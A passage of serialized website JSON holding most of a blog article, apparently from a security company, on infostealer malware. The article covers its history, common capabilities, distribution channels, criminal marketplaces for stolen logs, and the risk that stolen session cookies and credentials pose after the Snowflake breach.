s":173725,"value":4523,"nodeType":173},{},[],{"data":173727,"content":173728,"nodeType":186},{"uri":4526},[173729],{"data":173730,"marks":173731,"value":4532,"nodeType":173},{},[173732],{"type":194},{"data":173734,"marks":173735,"value":4536,"nodeType":173},{},[],{"data":173737,"content":173738,"nodeType":254},{},[173739],{"data":173740,"content":173741,"nodeType":178},{},[173742,173745,173752],{"data":173743,"marks":173744,"value":4546,"nodeType":173},{},[],{"data":173746,"content":173747,"nodeType":186},{"uri":4492},[173748],{"data":173749,"marks":173750,"value":4554,"nodeType":173},{},[173751],{"type":194},{"data":173753,"marks":173754,"value":4558,"nodeType":173},{},[],{"data":173756,"content":173757,"nodeType":178},{},[173758],{"data":173759,"marks":173760,"value":4565,"nodeType":173},{},[],{"data":173762,"content":173763,"nodeType":235},{},[173764],{"data":173765,"marks":173766,"value":4573,"nodeType":173},{},[173767],{"type":370},{"data":173769,"content":173770,"nodeType":178},{},[173771],{"data":173772,"marks":173773,"value":4580,"nodeType":173},{},[],{"data":173775,"content":173776,"nodeType":178},{},[173777],{"data":173778,"marks":173779,"value":4587,"nodeType":173},{},[],{"data":173781,"content":173784,"nodeType":312},{"target":173782},{"sys":173783},{"id":4592,"type":317,"linkType":318},[],{"data":173786,"content":173787,"nodeType":235},{},[173788],{"data":173789,"marks":173790,"value":4601,"nodeType":173},{},[173791],{"type":370},{"data":173793,"content":173794,"nodeType":178},{},[173795],{"data":173796,"marks":173797,"value":4608,"nodeType":173},{},[],{"data":173799,"content":173800,"nodeType":178},{},[173801],{"data":173802,"marks":173803,"value":4615,"nodeType":173},{},[],{"data":173805,"content":173806,"nodeType":178},{},[173807],{"data":173808,"marks":173809,"value":4622,"nodeType":173},{},[],{"data":173811,"content":173812,"nodeType":235},{},[173813],{"data":173814,"marks":173815,"value":4630,"nodeType":173},{},[173816],{"type":370},{"data":173818,"content":173819,"nodeType":178},{},[173820],{"data":173821,"marks":173822,"value":4637,"nodeType":173},{},[],{"data":173824,"content":173825,"nodeType":178},{},[173826],{"data":173827,"marks":173828,"value":4644,"nodeType":173},{},[],{"data":173830,"content":173831,"nodeType":178},{},[173832],{"data":173833,"marks":173834,"value":4651,"nodeType":173},{},[],{"data":173836,"content":173837,"nodeType":178},{},[173838],{"data":173839,"marks":173840,"value":4658,"nodeType":173},{},[],{"data":173842,"content":173845,"nodeType":312},{"target":173843},{"sys":173844},{"id":4663,"type":317,"linkType":318},[],{"data":173847,"content":173848,"nodeType":231},{},[],{"data":173850,"content":173851,"nodeType":169},{},[173852],{"data":173853,"marks":173854,"value":4675,"nodeType":173},{},[173855],{"type":370},{"data":173857,"content":173858,"nodeType":178},{},[173859],{"data":173860,"marks":173861,"value":4682,"nodeType":173},{},[],{"data":173863,"content":173864,"nodeType":250},{},[173865,173874,173883],{"data":173866,"content":173867,"nodeType":254},{},[173868],{"data":173869,"content":173870,"nodeType":178},{},[173871],{"data":173872,"marks":173873,"value":4695,"nodeType":173},{},[],{"data":173875,"content":173876,"nodeType":254},{},[173877],{"data":173878,"content":173879,"nodeType":178},{},[173880],{"data":173881,"marks":173882,"value":4705,"nodeType":173},{},[],{"data":173884,"content":173885,"nodeType":254},{},[173886],{"data":173887,"content":173888,"nodeType":178},{},[173889],{"data":173890,"marks":173891,"value":4715,"nodeType":173},{},[],{"data":173893,"content":173894,"nodeType":178},{},[173895],{"data":173896,"marks":173897,"value":4722,"nodeType":173},{},[],{"data":173899,"content":173900,"nodeType":178},{},[173901,173904,173910],{"data":173902,"marks":173903,"value":4729,"nodeType":173},{},[],{"data":173905,"content":173906,"nodeType":186},{"uri":4732},[173907],{"data":173908,"marks":173909,"value":4737,"nodeType":173},{},[],{"data":173911,"marks":173912,"value":4741,"nodeType":173},{},[],{"data":173914,"content":173915,"nodeType":178},{},[173916,173919,173926],{"data":173917,"marks":173918,"value":4748,"nodeType":173},{},[],{"data":173920,"content":173921,"nodeType":186},{"uri":4751},[173922],{"data":173923,"marks":173924,"value":4757,"nodeType":173},{},[173925],{"type":194},{"data":173927,"marks":173928,"value":4761,"nodeType":173},{},[],{"data":173930,"content":173933,"nodeType":312},{"target":173931},{"sys":173932},{"id":4766,"type":317,"linkType":318},[],{"data":173935,"content":173936,"nodeType":178},{},[173937],{"data":173938,"marks":173939,"value":37,"nodeType":173},{},[],{"items":173941},[173942],{"sys":173943,"name":505},{"id":504},{"items":173945},[173946],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":173947},{"url":1496},{"__typename":1528,"sys":173949,"content":173950,"title":46324,"synopsis":169048,"hashTags":118,"publishedDate":169049,"slug":46325,"tagsCollection":174270,"authorsCollection":174276},{"id":24875},{"json":173951},{"nodeType":165,"data":173952,"content":173953},{},[173954,173959,173962,173968,173974,173994,173997,174003,174009,174015,174031,174037,174040,174046,174052,174058,174064,174070,174100,174105,174132,174137,174140,174146,174152,174158,174163,174169,174174,174180,174183,174189,174202,174207,174213,174234,174237,174243,174259,174264],{"nodeType":312,"data":173955,"content":173958},{"target":173956},{"sys":173957},{"id":168687,"type":317,"linkType":318},[],{"nodeType":231,"data":173960,"content":173961},{},[],{"nodeType":169,"data":173963,"content":173964},{},[173965],{"nodeType":173,"value":168696,"marks":173966,"data":173967},[],{},{"nodeType":178,"data":173969,"content":173970},{},[173971],{"nodeType":173,"value":168703,"marks":173972,"data":173973},[],{},{"nodeType":178,"data":173975,"content":173976},{},[173977,173980,173984,173987,173991],{"nodeType":173,"value":168710,"marks":173978,"data":173979},[],{},{"nodeType":173,"value":168714,"marks":173981,"data":173983},[173982],{"type":194},{},{"nodeType":173,"value":168719,"marks":173985,"data":173986},[],{},{"nodeType":173,"value":168723,"marks":173988,"data":173990},[173989],{"type":194},{},{"nodeType":173,"value":168728,"marks":173992,"data":173993},[],{},{"nodeType":231,"data":173995,"content":173996},{},[],{"nodeType":169,"data":173998,"content":173999},{},[174000],{"nodeType":173,"value":168738,"marks":174001,"data":174002},[],{},{"nodeType":178,"data":174004,"content":174005},{},[174006],{"nodeType":173,"value":168745,"marks":174007,"data":174008},[],{},{"nodeType":178,"data":174010,"content":174011},{},[174012],{"nodeType":173,"value":168752,"marks":174013,"data":174014},[],{},{"nodeType":178,"data":174016,"content":174017},{},[174018,174021,174028],{"nodeType":173,"value":168759,"marks":174019,"data":174020},[],{},{"nodeType":186,"data":174022,"content":174023},{"uri":126102},[174024],{"nodeType":173,"value":168766,"marks":174025,"data":174027},[174026],{"type":194},{},{"nodeType":173,"value":168771,"marks":174029,"data":174030},[],{},{"nodeType":178,"data":174032,"content":174033},{},[174034],{"nodeType":173,"value":168778,"marks":174035,"data":174036},[],{},{"nodeType":231,"data":174038,"content":174039},{},[],{"nodeType":169,"data":174041,"content":174042},{},[174043],{"nodeType":173,"value":168788,"marks":174044,"data":174045},[],{},{"nodeType":178,"data":174047,"content":174048},{},[174049],{"nodeType":173,"value":168795,"marks":174050,"data":174051},[],{},{"nodeType":178,"data":174053,"content":174054},{},[174055],{"nodeType":173,"value":168802,"marks":174056,"data":174057},[],{},{"nodeType":178,"data":174059,"content":174060},{},[174061],{"nodeType":173,"value":168809,"marks":174062,"data":174063},[],{},{"nodeType":178,"data":174065,"content":174066},{},[174067],{"nodeType":173,"value":168816,"marks":174068,"data":174069},[],{},{"nodeType":250,"data":174071,"content":174072},{},[174073,174082,174091],{"nodeType":254,"data":174074,"content":174075},{},[174076],{"nodeType":178,"data":174077,"content":174078},{},[174079],{"nodeType":173,"value":168829,"marks":174080,"data":174081},[],{},{"nodeType":254,"data":174083,"content":174084},{},[174085],{"nodeType":178,"data":174086,"content":174087},{},[174088],{"nodeType":173,"value":168839,"marks":174089,"data":174090},[],{},{"nodeType":254,"data":174092,"content":174093},{},[174094],{"nodeType":178,"data":174095,"content":174096},{},[174097],{"nodeType":173,"value":168849,"marks":174098,"data":174099},[],{},{"nodeType":312,"data":174101,"content":174104},{"target":174102},{"sys":174103},{"id":168856,"type":317,"linkType":318},[],{"nodeType":235,"data":174106,"content":174107},{},[174108,174111,174115,174118,174122,174125,174129],{"nodeType":173,"value":168862,"marks":174109,"data":174110},[],{},{"nodeType":173,"value":168866,"marks":174112,"data":174114},[174113],{"type":194},{},{"nodeType":173,"value":168871,"marks":174116,"data":174117},[],{},{"nodeType":173,"value":168875,"marks":174119,"data":174121},[174120],{"type":194},{},{"nodeType":173,"value":168880,"marks":174123,"data":174124},[],{},{"nodeType":173,"value":168884,"marks":174126,"data":174128},[174127],{"type":194},{},{"nodeType":173,"value":3107,"marks":174130,"data":174131},[],{},{"nodeType":312,"data":174133,"content":174136},{"target":174134},{"sys":174135},{"id":168895,"type":317,"linkType":318},[],{"nodeType":231,"data":174138,"content":174139},{},[],{"nodeType":169,"data":174141,"content":174142},{},[174143],{"nodeType":173,"value":168904,"marks":174144,"data":174145},[],{},{"nodeType":178,"data":174147,"content":174148},{},[174149],{"nodeType":173,"value":168911,"marks":174150,"data":174151},[],{},{"nodeType":178,"data":174153,"content":174154},{},[174155],{"nodeType":173,"value":168918,"marks":174156,"data":174157},[],{},{"nodeType":312,"data":174159,"content":174162},{"target":174160},{"sys":174161},{"id":168925,"type":317,"linkType":318},[],{"nodeType":178,"data":174164,"content":174165},{},[174166],{"nodeType":173,"value":168931,"marks":174167,"data":174168},[],{},{"nodeType":312,"data":174170,"content":174173},{"target":174171},{"sys":174172},{"id":168938,"type":317,"linkType":318},[],{"nodeType":178,"data":174175,"content":174176},{},[174177],{"nodeType":173,"value":168944,"marks":174178,"data":174179},[],{},{"nodeType":231,"data":174181,"content":174182},{},[],{"nodeType":169,"data":174184,"content":174185},{},[174186],{"nodeType":173,"value":168954,"marks":174187,"data":174188},[],{},{"nodeType":178,"data":174190,"content":174191},{},[174192,174195,174199],{"nodeType":173,"value":168961,"marks":174193,"data":174194},[],{},{"nodeType":173,"value":168965,"marks":174196,"data":174198},[174197],{"type":370},{},{"nodeType":173,"value":197,"marks":174200,"data":174201},[],{},{"nodeType":312,"data":174203,"content":174206},{"target":174204},{"sys":174205},{"id":168976,"type":317,"linkType":318},[],{"nodeType":178,"data":174208,"content":174209},{},[174210],{"nodeType":173,"value":168982,"marks":174211,"data":174212},[],{},{"nodeType":250,"data":174214,"content":174215},{},[174216,174225],{"nodeType":254,"data":174217,"content":174218},{},[174219],{"nodeType":178,"data":174220,"content":174221},{},[174222],{"nodeType":173,"value":168995,"marks":174223,"data":174224},[],{},{"nodeType":254,"data":174226,"content":174227},{},[174228],{"nodeType":178,"data":174229,"content":174230},{},[174231],{"nodeType":173,"value":169005,"marks":174232,"data":174233},[],{},{"nodeType":231,"data":174235,"content":174236},{},[],{"nodeType":169,"data":174238,"content":174239},{},[174240],{"nodeType":173,"value":169015,"marks":174241,"data":174242},[],{},{"nodeType":178,"data":174244,"content":174245},{},[174246,174249,174256],{"nodeType":173,"value":169022,"marks":174247,"data":174248},[],{},{"nodeType":186,"data":174250,"content":174251},{"uri":473},[174252],{"nodeType":173,"value":169029,"marks":174253,"data":174255},[174254],{"type":194},{},{"nodeType":173,"value":1477,"marks":174257,"data":174258},[],{},{"nodeType":312,"data":174260,"content":174263},{"target":174261},{"sys":174262},{"id":169040,"type":317,"linkType":318},[],{"nodeType":178,"data":174265,"content":174266},{},[174267],{"nodeType":173,"value":37,"marks":174268,"data":174269},[],{},{"items":174271},[174272,174274],{"sys":174273,"name":18399},{"id":18398},{"sys":174275,"name":26137},{"id":26136},{"items":174277},[174278],{"fullName":513,"firstName":71176,"jobTitle":514,"profilePicture":174279},{"url":516},{"__typename":1528,"sys":174281,"content":174282,"title":168014,"synopsis":175419,"hashTags":118,"publishedDate":175420,"slug":168015,"tagsCollection":175421,"authorsCollection":175427},{"id":148636},{"json":174283},{"nodeType":165,"data":174284,"content":174285},{},[174286,174316,174328,174344,174351,174358,174361,174368,174375,174499,174506,174513,174607,174614,174621,174674,174681,174704,174761,174764,174771,174790,174810,174817,174836,174843,174855,174858,174865,174872,174920,174927,174934,174952,174955,174962,174969,174976,174995,175002,175009,175016,175034,175041,175048,175055,175062,175081,175088,175095,175102,175109,175138,175144,175147,175154,175161,175167,175174,175181,175204,175211,175218,175261,175277,175296,175302,175309,175316,175323,175355,175400,175407,175413],{"nodeType":178,"data":174287,"content":174288},{},[174289,174293,174301,174305,174312],{"nodeType":173,"value":174290,"marks":174291,"data":174292},"Infostealer malware seems to be grabbing the headlines right now. It’s easy to see why, too, after laying claim to one of the ",[],{},{"nodeType":186,"data":174294,"content":174295},{"uri":3999},[174296],{"nodeType":173,"value":174297,"marks":174298,"data":174300},"biggest breaches in history",[174299],{"type":194},{},{"nodeType":173,"value":174302,"marks":174303,"data":174304},". The ",[],{},{"nodeType":186,"data":174306,"content":174307},{"uri":74621},[174308],{"nodeType":173,"value":74624,"marks":174309,"data":174311},[174310],{"type":194},{},{"nodeType":173,"value":174313,"marks":174314,"data":174315}," saw ~165 businesses compromised using stolen credentials, resulting in millions of breached customer records, with the full impact still emerging. ",[],{},{"nodeType":178,"data":174317,"content":174318},{},[174319,174323],{"nodeType":173,"value":174320,"marks":174321,"data":174322},"Notably, ",[],{},{"nodeType":173,"value":174324,"marks":174325,"data":174327},"80% of the credentials used to access Snowflake customer accounts had found their way online after being stolen in infostealer infections – dating back as early as 2020. ",[174326],{"type":370},{},{"nodeType":178,"data":174329,"content":174330},{},[174331,174335,174340],{"nodeType":173,"value":174332,"marks":174333,"data":174334},"The Snowflake situation is a reminder of how lucrative stolen credentials can be for attackers – and how the cybercrime ecosystem has tilted as a result. As the saying goes nowadays, ",[],{},{"nodeType":173,"value":174336,"marks":174337,"data":174339},"hackers don’t hack in, they log in",[174338],{"type":370},{},{"nodeType":173,"value":174341,"marks":174342,"data":174343},". Stolen credentials are the lowest hanging fruit available to attackers, and their appetite (and the ecosystem needed to feed it) is insatiable. As an attacker, the prospect of picking up access to a major enterprise for just $10 or less (or even for free) is hard to resist – why wouldn’t you buy a ticket and take the gamble?  ",[],{},{"nodeType":178,"data":174345,"content":174346},{},[174347],{"nodeType":173,"value":174348,"marks":174349,"data":174350},"Infostealers are a huge part of the shift toward identity attacks. Along with phishing, infostealers are the primary mechanism for attackers to harvest credentials. Unlike phishing, infostealers can collect a large number of credentials (and other helpful data saved in the browser) in one fell swoop. But, they do have limitations. For example, you would expect any credible EDR to detect and block these attacks. And yet, the success of the attacks on Snowflake customers show us that gaps are being found and exploited.  ",[],{},{"nodeType":178,"data":174352,"content":174353},{},[174354],{"nodeType":173,"value":174355,"marks":174356,"data":174357},"In this article, we’ll look at the history of infostealers, how they work, and what the trends show us about how the cybercrime ecosystem is leaning into the opportunity they present.    ",[],{},{"nodeType":231,"data":174359,"content":174360},{},[],{"nodeType":169,"data":174362,"content":174363},{},[174364],{"nodeType":173,"value":174365,"marks":174366,"data":174367},"The state of infostealers today",[],{},{"nodeType":178,"data":174369,"content":174370},{},[174371],{"nodeType":173,"value":174372,"marks":174373,"data":174374},"Infostealers, and the mass credential harvesting they enable, are a big part of the rise in identity attacks. The stats support this, as:",[],{},{"nodeType":250,"data":174376,"content":174377},{},[174378,174400,174419,174440,174460,174479],{"nodeType":254,"data":174379,"content":174380},{},[174381],{"nodeType":178,"data":174382,"content":174383},{},[174384,174388,174397],{"nodeType":173,"value":174385,"marks":174386,"data":174387},"One million new stealer logs are distributed every month, with an estimated 3-5% containing credentials and session cookies to corporate IT environments (",[],{},{"nodeType":186,"data":174389,"content":174391},{"uri":174390},"https://www.bleepingcomputer.com/news/security/single-sign-on-and-the-cybercrime-ecosystem/",[174392],{"nodeType":173,"value":174393,"marks":174394,"data":174396},"Flare",[174395],{"type":194},{},{"nodeType":173,"value":53584,"marks":174398,"data":174399},[],{},{"nodeType":254,"data":174401,"content":174402},{},[174403],{"nodeType":178,"data":174404,"content":174405},{},[174406,174409,174416],{"nodeType":173,"value":150381,"marks":174407,"data":174408},[],{},{"nodeType":186,"data":174410,"content":174411},{"uri":150386},[174412],{"nodeType":173,"value":150389,"marks":174413,"data":174415},[174414],{"type":194},{},{"nodeType":173,"value":53584,"marks":174417,"data":174418},[],{},{"nodeType":254,"data":174420,"content":174421},{},[174422],{"nodeType":178,"data":174423,"content":174424},{},[174425,174429,174437],{"nodeType":173,"value":174426,"marks":174427,"data":174428},"147,000 token replay attacks were detected by Microsoft in 2023, an 111% increase year-over-year (",[],{},{"nodeType":186,"data":174430,"content":174432},{"uri":174431},"https://techcommunity.microsoft.com/t5/microsoft-entra-blog/how-to-break-the-token-theft-cyber-attack-chain/ba-p/4062700",[174433],{"nodeType":173,"value":1255,"marks":174434,"data":174436},[174435],{"type":194},{},{"nodeType":173,"value":60235,"marks":174438,"data":174439},[],{},{"nodeType":254,"data":174441,"content":174442},{},[174443],{"nodeType":178,"data":174444,"content":174445},{},[174446,174450,174457],{"nodeType":173,"value":174447,"marks":174448,"data":174449},"Over 1000 credentials are posted online per day, per marketplace with an average sale price of $10, and 65% posted less than one day after being collected (",[],{},{"nodeType":186,"data":174451,"content":174452},{"uri":125982},[174453],{"nodeType":173,"value":1300,"marks":174454,"data":174456},[174455],{"type":194},{},{"nodeType":173,"value":53584,"marks":174458,"data":174459},[],{},{"nodeType":254,"data":174461,"content":174462},{},[174463],{"nodeType":178,"data":174464,"content":174465},{},[174466,174470,174476],{"nodeType":173,"value":174467,"marks":174468,"data":174469},"Nearly half of the malware detected last year by Sophos targeted victims’ data specifically, and the majority of that malware was classified as infostealers (",[],{},{"nodeType":186,"data":174471,"content":174472},{"uri":150408},[174473],{"nodeType":173,"value":150411,"marks":174474,"data":174475},[],{},{"nodeType":173,"value":53584,"marks":174477,"data":174478},[],{},{"nodeType":254,"data":174480,"content":174481},{},[174482],{"nodeType":178,"data":174483,"content":174484},{},[174485,174489,174496],{"nodeType":173,"value":174486,"marks":174487,"data":174488},"Attacks on session cookies happen at the same order of magnitude as password-based attacks (",[],{},{"nodeType":186,"data":174490,"content":174491},{"uri":150450},[174492],{"nodeType":173,"value":96495,"marks":174493,"data":174495},[174494],{"type":194},{},{"nodeType":173,"value":53584,"marks":174497,"data":174498},[],{},{"nodeType":235,"data":174500,"content":174501},{},[174502],{"nodeType":173,"value":174503,"marks":174504,"data":174505},"How did we get here?",[],{},{"nodeType":178,"data":174507,"content":174508},{},[174509],{"nodeType":173,"value":174510,"marks":174511,"data":174512},"Let’s go back to the beginning. When they first emerged, infostealers were designed to steal online banking and credit card information. The most notable early example comes from as far back as 2006 with the ZeuS trojan. After the ZeuS source code was leaked in March 2011, the creation of multiple variants boosted the popularity of this type of malware and inspired the development of infostealers with increasingly sophisticated capabilities.",[],{},{"nodeType":178,"data":174514,"content":174515},{},[174516,174520,174529,174533,174542,174546,174555,174558,174567,174570,174579,174582,174591,174594,174603],{"nodeType":173,"value":174517,"marks":174518,"data":174519},"Modern infostealers rose to prominence in around 2018 with the emergence of ",[],{},{"nodeType":186,"data":174521,"content":174523},{"uri":174522},"https://malpedia.caad.fkie.fraunhofer.de/details/win.arkei_stealer",[174524],{"nodeType":173,"value":174525,"marks":174526,"data":174528},"Arkei",[174527],{"type":194},{},{"nodeType":173,"value":174530,"marks":174531,"data":174532},", which quickly spawned the more popular ",[],{},{"nodeType":186,"data":174534,"content":174536},{"uri":174535},"https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar",[174537],{"nodeType":173,"value":174538,"marks":174539,"data":174541},"Vidar",[174540],{"type":194},{},{"nodeType":173,"value":174543,"marks":174544,"data":174545}," stealer. Today, some of the most popular families are ",[],{},{"nodeType":186,"data":174547,"content":174549},{"uri":174548},"https://malpedia.caad.fkie.fraunhofer.de/details/win.risepro",[174550],{"nodeType":173,"value":174551,"marks":174552,"data":174554},"RisePro",[174553],{"type":194},{},{"nodeType":173,"value":2936,"marks":174556,"data":174557},[],{},{"nodeType":186,"data":174559,"content":174561},{"uri":174560},"https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer",[174562],{"nodeType":173,"value":174563,"marks":174564,"data":174566},"RedLine",[174565],{"type":194},{},{"nodeType":173,"value":2936,"marks":174568,"data":174569},[],{},{"nodeType":186,"data":174571,"content":174573},{"uri":174572},"https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc",[174574],{"nodeType":173,"value":174575,"marks":174576,"data":174578},"StealC",[174577],{"type":194},{},{"nodeType":173,"value":2936,"marks":174580,"data":174581},[],{},{"nodeType":186,"data":174583,"content":174585},{"uri":174584},"https://malpedia.caad.fkie.fraunhofer.de/details/win.raccoon",[174586],{"nodeType":173,"value":174587,"marks":174588,"data":174590},"Raccoon",[174589],{"type":194},{},{"nodeType":173,"value":9534,"marks":174592,"data":174593},[],{},{"nodeType":186,"data":174595,"content":174597},{"uri":174596},"https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma",[174598],{"nodeType":173,"value":174599,"marks":174600,"data":174602},"Lumma",[174601],{"type":194},{},{"nodeType":173,"value":174604,"marks":174605,"data":174606},", with new variants and families appearing all the time. ",[],{},{"nodeType":178,"data":174608,"content":174609},{},[174610],{"nodeType":173,"value":174611,"marks":174612,"data":174613},"Infostealers are used by all manner of threat actors of varying levels of sophistication. For larger groups with sufficient resources, the creation of new, custom stealers and malware packages is a common tactic to attempt to evade detection. ",[],{},{"nodeType":178,"data":174615,"content":174616},{},[174617],{"nodeType":173,"value":174618,"marks":174619,"data":174620},"But despite all the variants, infostealers do have common capabilities and characteristics, such as:",[],{},{"nodeType":250,"data":174622,"content":174623},{},[174624,174634,174644,174654,174664],{"nodeType":254,"data":174625,"content":174626},{},[174627],{"nodeType":178,"data":174628,"content":174629},{},[174630],{"nodeType":173,"value":174631,"marks":174632,"data":174633},"Extracting information from the browsers of a compromised device, such as passwords, cookies, autofill information, downloaded file information.",[],{},{"nodeType":254,"data":174635,"content":174636},{},[174637],{"nodeType":178,"data":174638,"content":174639},{},[174640],{"nodeType":173,"value":174641,"marks":174642,"data":174643},"Snapshotting the desktop and system inventory, with details such as the username, location data, hardware configuration, and information regarding installed security software.",[],{},{"nodeType":254,"data":174645,"content":174646},{},[174647],{"nodeType":178,"data":174648,"content":174649},{},[174650],{"nodeType":173,"value":174651,"marks":174652,"data":174653},"Sending stolen data back to a C2 server.",[],{},{"nodeType":254,"data":174655,"content":174656},{},[174657],{"nodeType":178,"data":174658,"content":174659},{},[174660],{"nodeType":173,"value":174661,"marks":174662,"data":174663},"Facilitating the deployment of additional tools and malware as part of a package. ",[],{},{"nodeType":254,"data":174665,"content":174666},{},[174667],{"nodeType":178,"data":174668,"content":174669},{},[174670],{"nodeType":173,"value":174671,"marks":174672,"data":174673},"Often (but not always) self-terminating once complete, leaving little trace on the victim machine and no ongoing behavior that might be detected. ",[],{},{"nodeType":178,"data":174675,"content":174676},{},[174677],{"nodeType":173,"value":174678,"marks":174679,"data":174680},"Infostealers are distributed in similar ways to other types of malware, such as:",[],{},{"nodeType":250,"data":174682,"content":174683},{},[174684,174694],{"nodeType":254,"data":174685,"content":174686},{},[174687],{"nodeType":178,"data":174688,"content":174689},{},[174690],{"nodeType":173,"value":174691,"marks":174692,"data":174693},"Delivery of malicious executable files via phishing emails or by having a victim download content from a malicious website. ",[],{},{"nodeType":254,"data":174695,"content":174696},{},[174697],{"nodeType":178,"data":174698,"content":174699},{},[174700],{"nodeType":173,"value":174701,"marks":174702,"data":174703},"‘Drive-by’ style attacks where the victim has only to visit an infected website.",[],{},{"nodeType":178,"data":174705,"content":174706},{},[174707,174711,174720,174723,174732,174735,174744,174748,174757],{"nodeType":173,"value":174708,"marks":174709,"data":174710},"They’re typically spread via malvertising, P2P downloads, and deceptive software download sites. ",[],{},{"nodeType":186,"data":174712,"content":174714},{"uri":174713},"https://www.bleepingcomputer.com/news/security/fake-cheat-lures-gamers-into-spreading-infostealer-malware/",[174715],{"nodeType":173,"value":174716,"marks":174717,"data":174719},"Gaming forums",[174718],{"type":194},{},{"nodeType":173,"value":2936,"marks":174721,"data":174722},[],{},{"nodeType":186,"data":174724,"content":174726},{"uri":174725},"https://cybersecuritynews.com/facebook-account-hijack-malware/",[174727],{"nodeType":173,"value":174728,"marks":174729,"data":174731},"Facebook ads",[174730],{"type":194},{},{"nodeType":173,"value":9534,"marks":174733,"data":174734},[],{},{"nodeType":186,"data":174736,"content":174738},{"uri":174737},"https://www.fortinet.com/blog/threat-research/lumma-variant-on-youtube",[174739],{"nodeType":173,"value":174740,"marks":174741,"data":174743},"YouTube video descriptions",[174742],{"type":194},{},{"nodeType":173,"value":174745,"marks":174746,"data":174747}," are popular locations for malicious links, but recent examples also include ",[],{},{"nodeType":186,"data":174749,"content":174751},{"uri":174750},"https://www.bleepingcomputer.com/news/security/over-3-000-github-accounts-used-by-malware-distribution-service/",[174752],{"nodeType":173,"value":174753,"marks":174754,"data":174756},"complex malware distribution networks on GitHub",[174755],{"type":194},{},{"nodeType":173,"value":174758,"marks":174759,"data":174760}," – such as the recent campaign from ‘Stargazer Goblin’ with more than 3,000 fake accounts creating and promoting hundreds of fake repositories to increase their apparent legitimacy and make them more likely to appear on GitHub's trending section.",[],{},{"nodeType":231,"data":174762,"content":174763},{},[],{"nodeType":169,"data":174765,"content":174766},{},[174767],{"nodeType":173,"value":174768,"marks":174769,"data":174770},"Infostealers are key to the cybercrime ecosystem",[],{},{"nodeType":178,"data":174772,"content":174773},{},[174774,174778,174786],{"nodeType":173,"value":174775,"marks":174776,"data":174777},"After being stolen, ",[],{},{"nodeType":186,"data":174779,"content":174780},{"uri":174390},[174781],{"nodeType":173,"value":174782,"marks":174783,"data":174785},"infostealer data inevitably finds its way onto hacker forums and marketplaces",[174784],{"type":194},{},{"nodeType":173,"value":174787,"marks":174788,"data":174789},", both on the clearweb and darkweb. Popular infostealers have their own dedicated Telegram channels to advertise and sell stolen data. Private channels also exist, with the channel owner distributing tens of thousands of logs per week to a limited number of threat actors who pay $200-$400 for access to the channel. This allows them to get ‘first pick’ of stolen logs, which are later shared through public Telegram channels. ",[],{},{"nodeType":178,"data":174791,"content":174792},{},[174793,174797,174806],{"nodeType":173,"value":174794,"marks":174795,"data":174796},"Public data eventually makes its way onto services such as Have I Been Pwned (HIBP), which gives individuals and security teams some visibility of which credentials have been compromised. For example, ",[],{},{"nodeType":186,"data":174798,"content":174800},{"uri":174799},"https://www.troyhunt.com/telegram-combolists-and-361m-email-addresses/",[174801],{"nodeType":173,"value":174802,"marks":174803,"data":174805},"in June, Troy Hunt (creator of HIBP) wrote",[174804],{"type":194},{},{"nodeType":173,"value":174807,"marks":174808,"data":174809}," about the impact of channels like Telegram and the sale of combolists (username, password, login portal URL), after being sent 122GB of data scraped out of thousands of Telegram channels, containing 361M unique email addresses (of which 151M had never been seen in HIBP before). ",[],{},{"nodeType":178,"data":174811,"content":174812},{},[174813],{"nodeType":173,"value":174814,"marks":174815,"data":174816},"The cybercrime ecosystem is complex, with a developed supply chain and organizations fulfilling different roles as a result: from malware-as-a-service developers, to initial access brokers, to the operators that actually conduct the attacks (be they ransomware, data theft, etc.) – and many, many other roles in between. Sometimes, a single group and/or its affiliates will conduct the full chain, but this is far less common today. ",[],{},{"nodeType":178,"data":174818,"content":174819},{},[174820,174823,174832],{"nodeType":173,"value":37,"marks":174821,"data":174822},[],{},{"nodeType":186,"data":174824,"content":174826},{"uri":174825},"https://www.secureworks.com/research/the-growing-threat-from-infostealers",[174827],{"nodeType":173,"value":174828,"marks":174829,"data":174831},"Infostealers are often sold by malware developers to other attackers as a monthly subscription service.",[174830],{"type":194},{},{"nodeType":173,"value":174833,"marks":174834,"data":174835}," The price can range from $50 to over $1,000 USD per month for access to a stealer command and control (C2) server operated by the developer. The service often features a range of support functions, including multiple ways to view, download, and share stolen data. Self-hosted stealer C2 servers are also available and are usually sold for a flat fee. ",[],{},{"nodeType":178,"data":174837,"content":174838},{},[174839],{"nodeType":173,"value":174840,"marks":174841,"data":174842},"There’s also evidence that there is an element of target coordination – with one marketplace, Russian Market, allowing users to ‘preorder’ credentials for a $1,000 USD deposit from 2022. ",[],{},{"nodeType":178,"data":174844,"content":174845},{},[174846,174851],{"nodeType":173,"value":174847,"marks":174848,"data":174850},"So what? Well, there's evidently an abundance of breached data already online, and attackers have the tools readily available to have this pile grow exponentially bigger and more useful.",[174849],{"type":370},{},{"nodeType":173,"value":174852,"marks":174853,"data":174854}," It’s also probably more coordinated than we like to admit – a particularly intimidating prospect in the wake of Snowflake, which will no doubt have many criminals smelling blood in the water. ",[],{},{"nodeType":231,"data":174856,"content":174857},{},[],{"nodeType":169,"data":174859,"content":174860},{},[174861],{"nodeType":173,"value":174862,"marks":174863,"data":174864},"How can stolen data be abused by attackers? ",[],{},{"nodeType":178,"data":174866,"content":174867},{},[174868],{"nodeType":173,"value":174869,"marks":174870,"data":174871},"It’s pretty obvious that attackers getting access to all of your passwords and session cookies is bad, but there is a clear value hierarchy from a corporate security perspective. So, from highest to lowest risk:",[],{},{"nodeType":250,"data":174873,"content":174874},{},[174875,174890,174905],{"nodeType":254,"data":174876,"content":174877},{},[174878],{"nodeType":178,"data":174879,"content":174880},{},[174881,174886],{"nodeType":173,"value":174882,"marks":174883,"data":174885},"Stolen session cookies",[174884],{"type":370},{},{"nodeType":173,"value":174887,"marks":174888,"data":174889}," simply need to be imported into an attacker’s browser to resume an active session on an app. That means access can be gained without needing to enter a username and password, or pass any MFA checks. ",[],{},{"nodeType":254,"data":174891,"content":174892},{},[174893],{"nodeType":178,"data":174894,"content":174895},{},[174896,174901],{"nodeType":173,"value":174897,"marks":174898,"data":174900},"Stolen usernames, passwords",[174899],{"type":370},{},{"nodeType":173,"value":174902,"marks":174903,"data":174904},", and login page URLs can be used to access any accounts that lack MFA. 